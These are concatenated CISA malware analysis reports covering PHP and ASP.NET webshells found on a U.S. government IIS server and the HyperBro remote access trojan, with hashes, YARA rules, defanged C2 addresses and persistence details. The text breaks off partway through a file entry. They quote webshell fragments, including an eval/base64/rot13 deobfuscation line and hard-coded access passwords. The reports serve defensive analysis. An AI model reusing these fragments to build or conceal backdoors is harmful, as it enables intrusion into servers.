droogggdhfhf[.]com

Tags

command-and-control

Relationships
droogggdhfhf[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
Description

3LXJyA6Gf.exe receives commands and payloads from this domain.

Relationship Summary

7d75244449... Connected_To dremmfyttrred[.]com
7d75244449... Connected_To droogggdhfhf[.]com
dremmfyttrred[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
droogggdhfhf[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

June 14, 2023

MAR-10443863-1.v1 CVE-2017-9248 Exploitation in U.S. Government IIS Server | CISA

  

Summary

Description

CISA received three files for analysis. The files included three webshells written in PHP: Hypertext Preprocessor (PHP), Active Server Pages Extended (ASPX), and .NET Dynamic-Link Library (DLL). The sample “sd.php” is highly obfuscated and uses rot13 algorithm, zlib for compression and base64 encoding for obfuscation. The “osker.aspx” webshell code was padded with junk code. The .NET DLL webshell is a .NET compiled version of osker.aspx. The samples are interactive webshells and have the ability to upload and manage files, create directories and files, and execute commands on the target machine.

For more information about this compromise, see Joint Cybersecurity Advisory Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers

Download the PDF version of this report:

MAR-10443863.r1.v1 (PDF, 864.35 KB )

For a downloadable copy of IOCs, see below or the JSON file.

AA23-074A.stix (XML, 38.86 KB )
Submitted Files (3)

6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa (osker.aspx)

b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b (App_Web_jl37rjxu.dll)

ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a (sd.php)

Findings

ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a

Tags

obfuscatedtrojanuploaderwebshell

Details

-->

Name sd.php
Size 5934 bytes
Type ASCII text, with very long lines, with CRLF line terminators
MD5 f899d6cbe1be6395a0fa2a802b8eb579
SHA1 e5f29cac0570665bc12f54a7e1894f139cc7b45e
SHA256 ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a
SHA512 6a9c23c3bd8a4b5f7301b80b7187ed6ae055a4e05e2b817800ddade99cb45e50bf3a96a57f9593aa8dfb49934ea48dba722ba3f4b0e8a8a634e6c86da335dcba
ssdeep 96:8byUcBL9vPh8onLQKwz9UL0wJ0v7R/+B3Oam8WgbVxzbiMhrhRrwSLpVt8lTHGk4:icBL9vFnL1wzGL0tt/cVxzvhrhRZl4hO
Entropy 6.110792
Malware Result unknown
Antivirus
ESET PHP/Agent.NPM trojan
YARA Rules
  • rule CISA_10443863_01 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-11"
           Last_Modified = "20230522_1200"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects obfuscated and deobfuscated interactive PHP webshell samples"
           SHA256 = "ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a"
       strings:
           $e0 = { 65 76 61 6c }
           $e1 = { 72 6f 74 31 33 }
           $e2 = { 62 61 73 65 36 34 }
           $e3 = { 67 7a 69 6e 66 6c 61 74 65 }
           $e4 = { 73 68 65 6c 6c }
           $e5 = { 78 61 69 73 79 6e 64 69 63 61 74 65 }
           $e6 = { 54 75 62 61 67 75 73 4e 4d }
           $s0 = { 58 30 4d 42 31 33 }
           $s1 = { 74 75 6e 61 66 65 65 73 68 }
           $s2 = { 70 61 73 73 77 6f 72 64 }
           $s3 = { 6f 6e ( 63 | 43 ) 6c 69 63 6b 3d }
           $s4 = { 6a 61 76 61 73 63 72 69 70 74 3a 78 79 6e }
       condition:
           (6 of ($e*)) or (3 of ($s*))
    }
ssdeep Matches

No matches found.

Description

This sample is an obfuscated PHP interactive webshell. This webshell is encoded and obfuscated using rot13, gzinflate and base64 as seen in the following code: “eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));” The obfuscated code is a string and is stored in the $sym variable from where it is read and decoded upon execution (Figure 1). The webshell requires the password "pass" for authentication and uses the string “$xyn='tunafeesh';” as a cookie to authenticate.

This webshell enumerates the local system it infects including the operating system, current user, directories, files and permissions. The webshell has the ability to create, rename, and delete files and directories. Furthermore, it has the ability to upload additional files to the affected webserver, run in Safe Mode and execute commands via cmd.exe (Figure 2). The webshell provides a Graphical User Interface (GUI) to the operator to perform these operations on the infected machine.

---Notable Strings Begin---
eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));
tunafeesh
pass
TubagusNM
xaisyndicate
garuda tersakti
con7ext_shell
b374k shell
X0MB13
[email protected]
hxxp[:]//www[.]twitter[.]com/X0MB13_
hxxp[:]//www[.]fb[.]com/xombie.xombie.7
onClick="xyn
---Notable Strings End---

Screenshots
AR23-166A Figure 1

Figure 1. - $sym variable with obfuscated code.

AR23-166A Figure 2

Figure 2. - sd.php webshell interface. Threat Actor (TA) would have access to this interface remotely to conduct various actions like upload additional files, create directories and files, run commands and more.

6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa

Tags

backdoor trojan webshell

Details

-->

Name osker.aspx
Size 107843 bytes
Type data
MD5 fcb8a6a264d05f1689c9dce5824b217d
SHA1 001e4906879e78d567a30502638233f34292504a
SHA256 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa
SHA512 703437c5742f343cabc6023698e031f0c4167252e9679d4e4fd13d9703f27de21faa7edf275bd9a39c4b2e454a83c43d555849ae61a0897ac1da9ed6be820d4d
ssdeep 3072:K+mYWYJo8+p87xbsTttEtizQhch+mYWYJo8+pO:K+mYDnhch+mYDD
Entropy 6.343192
Malware Result unknown
Antivirus
IKARUS Trojan.ASP.Agent
McAfee ASP/Backdoor.i
Varist JS/Agent.AIW
YARA Rules
  • rule CISA_10443863_02 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-11"
           Last_Modified = "20230522_1200"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects interactive ASP NET webshell samples"
           SHA256 = "ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a"
       strings:
           $s0 = { 3c 25 40 20 50 61 67 65 20 4c 61 6e 67 75 61 67 65 3d 22 43 23 22 }
           $s1 = { 62 61 73 65 36 34 ( 44 | 64 ) 65 63 6f 64 65 }
           $s2 = { 53 65 6c 65 63 74 20 2a 20 66 72 6f 6d 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 }
           $s3 = { 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d }
           $s4 = { 73 71 6c 63 6d 64 2e 65 78 65 }
           $s5 = { 63 6d 64 2e 65 78 65 }
           $s6 = { 49 49 53 20 56 65 72 73 69 6f 6e }
           $s7 = { 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
6ce087b904... Related_To b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
Description

This sample is an ASP .NET webshell. The webshell code was padded with junk code for detection evasion. The beginning of the webshell code can be seen in Figure 3. It is possible to access the webshell interactively via browser to view the GUI as seen in Figure 4.

This webshell has the ability to enumerate drive name and type, software, operating system versions, processes, and users, and has ability to copy, create and delete files, directories and databases. Furthermore, this webshell is able to upload, download, run and execute commands using cmd.exe and sqlcmd.exe. This webshell has the ability to interact with and manipulate SQL databases. Furthermore, this webshell uses Windows Management Instrumentation (WMI) Management Objects to query processes, users and network domains. It is also able to encode and decode data using base64.

---Notable Strings Begin---
osker
321
base64Decode
Select * from Win32_Process
Select * from Win32_Process Where ProcessID
Add_Table_Row(tbl, "Server IP", Request.ServerVariables["LOCAL_ADDR"]);
Add_Table_Row(tbl, "Host Name", Dns.GetHostName() );//Environment.MachineName);
Add_Table_Row(tbl, "IIS Version", Request.ServerVariables["SERVER_SOFTWARE"]);
Add_Table_Row(tbl, "IIS APPPOOL Identity", Environment.UserName);
Add_Table_Row(tbl, "OS Version", Environment.OSVersion.ToString());
myconn = new SqlConnection(connections.Text);
myconn.Open();
string command = query;
mycomm = new SqlCommand(command, myconn);
SqlDataReader dr = mycomm.ExecuteReader();
string query = "Select * from Win32_Process Where ProcessID = "" + processName + """;
ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);
ManagementObjectCollection processList = searcher.Get();
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
---Notable Strings End---

Screenshots
aa23-166a Figure 3.

Figure 3. - Beginning of osker.aspx webshell code.

ar23-166a Figure 4

Figure 4. - Web interface for osker.aspx webshell. The webshell interface password is “321”.

b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b

Tags

backdoortrojanwebshell

Details

-->

Name App_Web_jl37rjxu.dll
Size 163840 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 71323c956317b6b2c8e4ed4595ccfe5a
SHA1 7ebd98f97f61cabff05438dfac34d0331ce233aa
SHA256 b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
SHA512 2da3716aab9c9a8a85705c1372c4d75250dc021caa4f3b7566f6c142bdb3a45a063ec5f343b15b9be6056890768e80e7512f6ddbb86de178c475a160f56c0dad
ssdeep 3072:XEFKnpDtdIftAIe66rOqhTG0t7x2IftAIe66rOqhTG0:XEyJXmtQTO+ymtQTO+
Entropy 5.776030
Malware Result unknown
Antivirus
Antiy Trojan[Backdoor]/ASP.WebShell
Avira BDS/Redcap.euknj
Bitdefender Trojan.Generic.33706396
Emsisoft Trojan.Generic.33706396 (B)
McAfee RDN/Generic BackDoor
Zillya! Backdoor.WebShell.Script.653
YARA Rules
  • rule CISA_10443863_03 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-16"
           Last_Modified = "20230605_1500"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects .NET DLL webshell samples"
           SHA256 = "b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b"
       strings:
           $s0 = { 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 2a 00 20 00 66 00 72 00 6f 00 6d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 }
           $s1 = { 62 61 73 65 36 34 ( 44 | 64 ) 65 63 6f 64 65 }
           $s2 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d }
           $s3 = { 49 00 49 00 53 00 20 00 41 00 50 00 50 00 50 00 4f 00 4f 00 4c }
           $s4 = { 4d 61 6e 61 67 65 6d 65 6e 74 4f 62 6a 65 63 74 }
           $s5 = { 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 }
           $s6 = { 73 71 6c 71 75 65 72 79 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
b63c95300c... Related_To 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa
Description

This is a 32-bit .NET Dynamic-Link Library (DLL) file. This sample is a ASP .NET webshell and is related to the osker.aspx file. These webshells may affect Microsoft Exchange Servers and IIS services exploited by the ProxyLogon vulnerability. This sample is a .NET DLL file that is created by the ASP.NET Runtime when ASPX script is seen for the first time on the system. The capabilities and functions are identical to the osker.aspx file.

Relationship Summary

6ce087b904... Related_To b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
b63c95300c... Related_To 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

 

November 25, 2022

MAR-10365227-2.v1 | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA) to provide detailed analysis of files associated with HyperBro, a Remote Access Trojan (RAT). CISA obtained HyperBro malware samples during an on-site incident response engagement at a Defense Industrial Base (DIB) Sector organization compromised by advanced persistent threat (APT) actors.

CISA analyzed 4 files associated with HyperBro malware. The files creates a backdoor program that is capable of uploading and downloading files to and from the system. The RAT is also capable of logging keystrokes and executing commands on the system.

For more information on the confirmed compromise, see Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.

Download the STIX version of this report: MAR-10365227-2.v1 249B

Submitted Files (4)

52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7 (vftrace.dll)

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 (msmpeng.exe)

f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230 (config.ini)

f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780 (thumb.dat)

IPs (1)

104.168.236.46

Findings

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348

Tags

loader

Details
Name msmpeng.exe
Size 351240 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4109ac08bdc8591c7b46348eb1bca85d
SHA1 6423d1c324522bfd2b65108b554847ac4ab02479
SHA256 df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
SHA512 0605362190a9cb04a7392c7eae3ef79964a76ea68dc03dfabe6ec8f445f1c355772f2ca8166cbee73188e57bff06b74fb2cfa59869cb4461fffe1c3589856554
ssdeep 6144:BTMoU0+zvvLIpa8bo5GOc1G41vupWn2rwRGekPHZLZKA1UnmOlm:XUDvvsc80AOc1GYvAW2EGtH5ZKAKmOQ
Entropy 6.471736
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-01-05 08:22:40-05:00
Import Hash b66afb12e84aa5ce621a6635837cadba
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name vf_host.exe
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename vf_host.exe
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
3822119e846581669481aba79308c57c header 1024 2.580725
98ccfff2af4ccaa3335f63592a1fba02 .text 270848 6.543317
9dcc89a0d16e36145bb07924ca260dfe .rdata 50688 5.132125
14d493033fc147f67601753310725b2b .data 5632 3.711689
615729d1383743a91b8baf309f1a8232 .rsrc 16896 4.839559
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
df847abbfa... Used 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact is a version of vf_host.exe from Viewfinity. The file is used to side-load the malicious dynamic-link library (DLL), vftrace.dll.

The program is also capable of bypassing User Account Controls (UAC) on the system by disabling Admin Approval Mode in User Account Controls Group Policy in HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem. This can allow the malware to run with Admin privileges, or allow remote logon (RDP) with full Admin privileges.

52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7

Tags

trojan

Details
Name vftrace.dll
Size 73728 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 7655ff65f74f08ee2c54f44e5ef8f098
SHA1 3c7beb8978feac9ba8f5bab0656242232471bf7d
SHA256 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
SHA512 efea9b8a7b6b7cfa31814af4ffe45fab68d159a6239271b632166b2f6b44af8a4e1cc559fa56537ec4142e0484031a9b79034d4e5a8cbbf1d5250b86370cdfcf
ssdeep 1536:d0X1BkgxVXJyBaUihWutqQQ4znsWgcdqydbPX:O7XMBOs41znqypP
Entropy 6.334911
Antivirus
Adaware Gen:Variant.Bulz.429221
AhnLab Trojan/Win.HYPERBRO
Avira TR/Injector.nmrbf
Bitdefender Gen:Variant.Bulz.429221
Comodo Malware
Cyren W32/Agent.GCPS-3922
ESET a variant of Win32/LuckyMouse.BR trojan
IKARUS Trojan.Win32.LuckyMouse
K7 Riskware ( 0040eff71 )
NANOAV Trojan.Win32.LuckyMouse.iwacwz
Sophos Troj/Agent-BGVD
Trend Micro Trojan.780F7AE8
Trend Micro HouseCall Trojan.780F7AE8
VirusBlokAda TScope.Malware-Cryptor.SB
Zillya! Trojan.LuckyMouse.Win32.24
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2021-03-02 02:18:56-05:00
Import Hash 182f35372e9fd050b6e0610238bcd9fd
PE Sections
MD5 Name Raw Size Entropy
a89421fb59d33658892123b94906aa72 header 1024 2.836214
624b09cd367db7ebfc510aab51f95791 .text 42496 6.692212
8885c137e1772d11b48e71da92aa3d3c .rdata 23552 4.949495
2304803a4ce5a785e19eb0b45efb7065 .data 2048 2.051382
2139727f6ccf1b15d0f96e805001b2fc .gfids 512 1.386027
a4fc8d9199bcb8669008e62d5dc7d675 .rsrc 512 4.712298
73a0737f1475d88793ad42fc04bef1ab .reloc 3584 6.466489
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
52072a8f99... Connected_To 104.168.236.46
52072a8f99... Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
52072a8f99... Created f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
52072a8f99... Created f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
Description

This DLL is side-loaded by df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 detailed in this report.

When the DLL is executed it will create a Globally Unique Identifier (GUID) to identify the system to the command and control (C2) during communication. The GUID is written to a file called 'Config.ini' and placed in the current directory.

The program will decrypt and read a configuration file called 'thumb.dat' that instructs it to spawn a new instance of the Service Host Process (svchost.exe) and inject itself into the new instance. Svchost.exe is run with the -k netsvcs parameter to allow the malware to connect to its C2. The malware collects the following information to send to the C2 via POST when establishing a connection.

---Begin Collected Information---
Computer Name
IP Address
Path to the malware location
Process name that it is running in (svchost.exe)
Mode
Name of the malware
GUID
---End Collected Information---

During analysis, the malware attempted to connect to the Uniform Resource Identifier (URI), hxxps[:]//104.168.236.46/api/v2/ajax using the fixed User-Agent string Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36.

To achieve persistence on the system, the program creates a service in the registry called ‘Windows Defenders Service’ that starts automatically when the user logs on.

---Begin Registry Settings---
HKLMSystemCurrentControlSetserviceswindefendersType. Data: 272
HKLMSystemCurrentControlSetserviceswindefendersStart. Data: 2
HKLMSystemCurrentControlSetserviceswindefendersErrorControl. Data: 1
HKLMSystemCurrentControlSetserviceswindefendersImagePath    Data: “C:Program Files (x86)Common Fileswindefendersmsmpenge.exe"
HKLMSystemCurrentControlSetserviceswindefendersDisplayName    Data: Windows Defenders
HKLMSystemCurrentControlSetserviceswindefendersWOW64. Data: 1
HKLMSystemCurrentControlSetserviceswindefendersObjectName. Data: LocalSystem
HKLMSystemCurrentControlSetserviceswindefende37337060DeleteFlag. Data: 1
HKLMSystemCurrentControlSetserviceswindefende37337060Start. Data: 4
HKLMSystemCurrentControlSetserviceswindefendersDescription    Data: Windows Defenders Service
---End Registry Settings---

It may also create an autorun entry in the registry at HKLMSoftwareMicrosoftWindowsCurrent VersionRun.

The malware creates a hidden folder called ‘windefenders’ in the path C:Program Files (x86)Common Files where it will copy the PE file ‘msmpeng.exe’ along with the GUID file, ‘config.ini’, the malicious library ‘vftrace.dll’, and the encrypted configuration file ‘thumb.dat’. A second hidden folder called ‘windefenders’ is also created in the path C:ProgramData. This folder holds another instance of the PE file.

The program is capable of logging keystrokes, uploading and downloading files, and will also invoke RpcServerListen to wait for incoming Remote Procedure Call (RPC) connections. It will also open a pipe called ‘DeviceNamedPipetestpipe’ that it uses to pass commands from its daemon to any worker processes it may set up.

104.168.236.46

Tags

command-and-control

URLs
  • hxxps[:]//104.168.236.46/api/v2/ajax
Ports
  • 443 TCP
Whois

Domain Name: HOSTWINDSDNS.COM
Registry Domain ID: 1655837964_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2021-06-25T06:27:14Z
Creation Date: 2011-05-12T23:01:53Z
Registry Expiry Date: 2029-05-12T23:01:53Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.HOSTWINDSDNS.COM
Name Server: DNS2.HOSTWINDSDNS.COM
Name Server: DNS3.HOSTWINDSDNS.COM
Name Server: DNS4.HOSTWINDSDNS.COM
DNSSEC: unsigned

Domain name: hostwindsdns.com
Registry Domain ID: 1655837964_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-04-27T12:40:10.00Z
Creation Date: 2011-05-12T23:01:53.00Z
Registrar Registration Expiration Date: 2029-05-12T23:01:53.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Redacted for Privacy Purposes
Registrant Name: Redacted for Privacy Purposes
Registrant Organization: Redacted for Privacy Purposes
Registrant Street: Redacted for Privacy Purposes
Registrant City: Redacted for Privacy Purposes
Registrant State/Province: WA
Registrant Postal Code: Redacted for Privacy Purposes
Registrant Country: US
Registrant Phone: Redacted for Privacy Purposes
Registrant Phone Ext: Redacted for Privacy Purposes
Registrant Fax: Redacted for Privacy Purposes
Registrant Fax Ext: Redacted for Privacy Purposes
Registrant Email: Select Contact Domain Holder link at https://www.namecheap.com/domains/whois/result?domain=hostwindsdns.com
Registry Admin ID: Redacted for Privacy Purposes
Admin Name: Redacted for Privacy Purposes
Admin Organization: Redacted for Privacy Purposes
Admin Street: Redacted for Privacy Purposes
Admin City: Redacted for Privacy Purposes
Admin State/Province: Redacted for Privacy Purposes
Admin Postal Code: Redacted for Privacy Purposes
Admin Country: Redacted for Privacy Purposes
Admin Phone: Redacted for Privacy Purposes
Admin Phone Ext: Redacted for Privacy Purposes
Admin Fax: Redacted for Privacy Purposes
Admin Fax Ext: Redacted for Privacy Purposes
Admin Email: Select Contact Domain Holder link at https://www.namecheap.com/domains/whois/result?domain=hostwindsdns.com
Registry Tech ID: Redacted for Privacy Purposes
Tech Name: Redacted for Privacy Purposes
Tech Organization: Redacted for Privacy Purposes
Tech Street: Redacted for Privacy Purposes
Tech City: Redacted for Privacy Purposes
Tech State/Province: Redacted for Privacy Purposes
Tech Postal Code: Redacted for Privacy Purposes
Tech Country: Redacted for Privacy Purposes
Tech Phone: Redacted for Privacy Purposes
Tech Phone Ext: Redacted for Privacy Purposes
Tech Fax: Redacted for Privacy Purposes
Tech Fax Ext: Redacted for Privacy Purposes
Tech Email: Select Contact Domain Holder link at https://www.namecheap.com/domains/whois/result?domain=hostwindsdns.com
Name Server: dns1.hostwindsdns.com
Name Server: dns2.hostwindsdns.com
Name Server: dns3.hostwindsdns.com
Name Server: dns4.hostwindsdns.com
DNSSEC: unsigned

Relationships
104.168.236.46 Connected_From 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

During analysis, the file vftrace.dll attempted to connect to this domain.

f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230

Details
Name config.ini
Size 49 bytes
Type ASCII text, with CRLF line terminators
MD5 9d8d7d7bb357ee37a6ae71c5140f28b9
SHA1 40fc8b1a691339b9fa1526970ff2a2e1d3f899d7
SHA256 f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
